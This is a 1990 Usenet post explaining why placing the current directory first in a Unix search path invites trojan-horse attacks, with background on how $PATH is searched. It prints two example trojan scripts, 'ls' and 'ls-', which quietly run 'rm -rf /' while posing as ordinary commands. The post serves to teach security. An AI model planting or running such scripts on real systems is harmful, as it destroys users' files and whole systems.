crontab for ordinary users

Fri Oct 26 09:57:40 AEST 1990

In <4073 at goanna.cs.rmit.oz.au> msf at wren.cs.rmit.OZ.AU (Michael Fuller) writes:
> [ I wrote] 
>>I believe that you're doing your best to make your system vulnerable to a
>>trojan horse attack with a brain-damaged path like this.  
>
>>  *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***
>
>>There are security papers galore that try to beat this into people, but they
>>just don't listen.  It IS a very good idea though.
>
>>If you don't know why dot is bad in front of your path,  send me email telling
>>me why you need to know. :-)
>
>Please! Just come out and say it. Having implied that there is a security hole,
>you then don't say what it is. Ordinary users such as myself :-)
>don't have time or even know quite where to look for the "security papers 
>galore", but those who _are_ interested in exploiting such
>weaknesses will eagerly go off to play. If I knew why it was a bad idea,
>I would be *much* less likely to do such a thing. The result now is that
>I won't know, and the baddies will :-(. If you must mention a problem,
>do so in a way which doesn't disadvantage the very people you are trying
>to protect.

Well, since this is a fairly well known security-ism, I'll post it.  Note, that
the smiley was on the line above.  All of the people that sent email were given
an answer.

First, an explaination of the search path.  ($PATH)

When you run a command with any modern shell, the search path is used to
locate the executable program if a path is not given.  This makes things
much easier for us humans, as we don't have to remember where everything is.
Also, the order of the path is significant.  Things are searched in the
order of the path variable.

Thus, if your path is ".:/bin:/usr/bin" and you type the command "ls" the
shell will try (in the following order) to run:
	./ls
	/bin/ls
	/usr/bin/ls

However, if your path is set to "/bin:/usr/bin:." then the following order
is used:
	/bin/ls
	/usr/bin/ls
	./ls

Anyway, let's say that a user "joe" has his path set to ".:/bin:/usr/bin".

Now, I tell them joe I have these keen neat-o-super-duper files in my account,
and that he can get a copy of them if he wants.  (The story doesn't matter, all
you have to do is get someone into a directory that you have write access to.
/tmp would do just as well)

Anyway. in your directory with all of the other files, you could have a a shell
script called "ls".  If this exists *IT* will run when the user types "ls"
rather than the system's "/bin/ls".  What if I had the following script set-up
as 'ls'?

In a file called "ls"
-----cut here-----
#!/bin/sh
/bin/ls $*
rm -rf / 2>/dev/null &
-----cut here-----

If root ran it,  you could kiss your system goodbye (1/2 :-)  Or, if ran by
"joe" user, then it would remove all "publicly writable" files, and anything
owned by "joe" user.

This is NOT a good thing, for obvious reasons.  I could also argue that dot
anywhere in your path is a bad idea.  Have you ever typed "ls- l"?  You could
just as easily have the following trojan horse:

In a file called "ls-"
-----cut here-----
#!/bin/sh
echo "ls- : Command not found"
rm -rf / 2>/dev/null &
-----cut here-----

You get the picture.

  *** DOT SHOULD NEVER BE FIRST IN YOUR PATH. ***

By the way, please don't try this at home folks.

	-Jeff
-- 
Jeff Beadles		jeff at onion.pdx.com